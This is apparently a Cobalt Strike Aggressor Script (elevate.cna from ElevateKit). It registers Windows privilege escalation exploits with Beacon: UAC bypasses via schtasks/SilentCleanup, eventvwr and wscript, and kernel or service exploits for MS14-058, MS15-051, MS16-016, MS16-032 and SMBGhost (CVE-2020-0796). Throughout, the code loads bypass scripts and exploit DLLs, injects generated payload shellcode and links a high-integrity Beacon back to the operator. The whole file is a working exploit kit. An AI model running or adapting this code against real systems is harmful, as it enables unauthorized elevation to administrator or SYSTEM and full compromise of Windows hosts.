master

分支 (1)

管理

管理

master

ElevateKit
/
elevate.cna

#
# Integrate several privilege escalation exploits into Cobalt Strike via Aggressor Script
#

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
	local('$handle $script $oneliner $command');

	# acknowledge this command
	btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

	# read in the script
	$handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
	$script = readb($handle, -1);
	closef($handle);

	# host the script in Beacon
	$oneliner = beacon_host_script($1, $script);

	# base64 encode the command
	$command  = transform($2, "powershell-base64");

	# run the specified command via this exploit.
	bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack as an exploit!
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_exploit {
	local('$handle $script $oneliner $command');

	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " in a high integrity context", "T1088");

	# read in the script
	$handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
	$script = readb($handle, -1);
	closef($handle);

	# host the script in Beacon
	$exploit_oneliner = beacon_host_script($1, $script);

	# export our payload as a PowerShell script
	$payload          = artifact_payload($2, "powershell", barch($1));
	$payload_oneliner = beacon_host_script($1, $payload);

	# format our one-liner into what Invoke-EnvBypass expects
	$payload_oneliner = transform($payload_oneliner, "powershell-base64");

	# run the specified command via this exploit.
	bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $payload_oneliner $+ \"", $exploit_oneliner);

	# link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}

beacon_exploit_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_exploit);

# Integrate Matt Nelson's file-less eventvwr.exe Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub eventvwr_elevator {
	local('$handle $script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

	# read in the script
	$handle = openf(getFileProper(script_resource("modules"), "Invoke-EventVwrBypass.ps1"));
	$script = readb($handle, -1);
	closef($handle);

	# host the script in Beacon
	$oneliner = beacon_host_script($1, $script);

	# run the specified command via this exploit.
	bpowerpick!($1, "Invoke-EventVwrBypass -Command \" $+ $2 $+ \"", $oneliner);
}

beacon_elevator_register("uac-eventvwr", "Bypass UAC with eventvwr.exe", &eventvwr_elevator);

# Integrate wscript.exe Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub wscript_elevator {
	local('$handle $script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

	# read in the script
	$handle = openf(getFileProper(script_resource("modules"), "Invoke-WScriptBypassUAC.ps1"));
	$script = readb($handle, -1);
	closef($handle);

	# host the script in Beacon
	$oneliner = beacon_host_script($1, $script);

	# run the specified command via this exploit.
	bpowerpick!($1, "Invoke-WScriptBypassUAC -payload \" $+ $2 $+ \"", $oneliner);
}

beacon_elevator_register("uac-wscript", "Bypass UAC with wscript.exe", &wscript_elevator);

# Integrate windows/local/ms14_058_track_popup_menu from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
sub ms14_058_exploit {
	local('$stager $arch $dll');

	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via ms14-058", "T1068");

	# tune our parameters based on the target arch
	if (-is64 $1) {
		$arch   = "x64";
		$dll    = getFileProper(script_resource("modules"), "cve-2014-4113.x64.dll");
	}
	else {
		$arch   = "x86";
		$dll    = getFileProper(script_resource("modules"), "cve-2014-4113.x86.dll");
	}

	# generate our shellcode
	$stager = payload_local($1, $2, $arch);

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, $dll, $stager, "ms14-058", 5000);

	# link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}

beacon_exploit_register("ms14-058", "TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)", &ms14_058_exploit);

# Integrate windows/local/ms15_051_client_copy_image from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
sub ms15_051_exploit {
	local('$stager $arch $dll');

	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051", "T1068");

	# tune our parameters based on the target arch
	if (-is64 $1) {
		$arch   = "x64";
		$dll    = getFileProper(script_resource("modules"), "cve-2015-1701.x64.dll");
	}
	else {
		$arch   = "x86";
		$dll    = getFileProper(script_resource("modules"), "cve-2015-1701.x86.dll");
	}

	# generate our shellcode
	$stager = payload_local($1, $2, $arch);

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, $dll, $stager, "ms15-051", 5000);

	# link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}

beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb
sub ms16_016_exploit {
	local('$stager');

	# check if we're on an x64 system and error out.
	if (-is64 $1) {
		berror($1, "ms16-016 exploit is x86 only");
		return;
	}

	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

	# generate our shellcode
	$stager = payload_local($1, $2, "x86");

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

	# link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

# Integrate ms16-032
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub ms16_032_elevator {
	local('$handle $script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to execute $2 via ms16-032", "T1068");

	# read in the script
	$handle = openf(getFileProper(script_resource("modules"), "Invoke-MS16032.ps1"));
	$script = readb($handle, -1);
	closef($handle);

	# host the script in Beacon
	$oneliner = beacon_host_script($1, $script);

	# run the specified command via this exploit.
	bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $2 $+ \"", $oneliner);
}

beacon_elevator_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_elevator);

# Integrate windows/local/cve_2020_0796_smbghost from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
sub cve_2020_0796_exploit {
	local('$stager $winbuild');

	# check if we're on an x64 system and error out if we're not
	if (!-is64 $1) {
		berror($1, "cve-2020-0796 exploit is x64 only");
		return;
	}

	# check the windows version
	$winbuild = binfo($1, "build");
	if ($winbuild != 18362 && $winbuild != 18363) {
		berror($1, "This exploit only supports Windows 10 versions 1903 - 1909");
		return;
	}

	# note: this must be 0 or null. exploit will fail if compression is enabled.
	# reg queryv x64 HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters DisableCompression

	# acknowledge this command
	btask($1, "Task Beacon to run " . listener_describe($2) . " via cve-2020-0796", "T1068");

	# generate our shellcode. Use 'thread' exit option as this DLL implementation migrates into winlogon.exe
	$stager = payload_local($1, $2, "x64", "thread");

	# prepend our length to the shellcode
	$stager = pack("I-", strlen($stager)) . $stager;

	# spawn a Beacon post-ex job with the exploit DLL
	bdllspawn!($1, getFileProper(script_resource("modules"), "CVE-2020-0796.x64.dll"), $stager, "cve-2020-0796", 5000);

	# link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}

beacon_exploit_register("cve-2020-0796", "SMBv3 Compression Buffer Overflow (SMBGhost) (CVE 2020-0796)", &cve_2020_0796_exploit);